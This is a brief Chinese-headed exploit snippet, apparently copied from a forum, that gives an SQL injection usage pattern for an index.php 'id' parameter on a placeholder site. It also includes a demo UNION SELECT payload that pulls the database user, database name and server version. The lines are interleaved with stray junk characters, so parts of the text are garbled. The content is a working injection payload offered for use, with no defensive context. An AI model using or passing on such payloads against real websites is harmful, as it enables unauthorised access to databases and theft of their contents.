利用方法:
' _$ r# s# Q' Z2 J* G7 k http://www.xxx.com/index.php?id=[SQL]
p+ u) S! P% C& R7 E4 T& g: e Demo:4 I8 V# }2 F, P! Q" Q
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |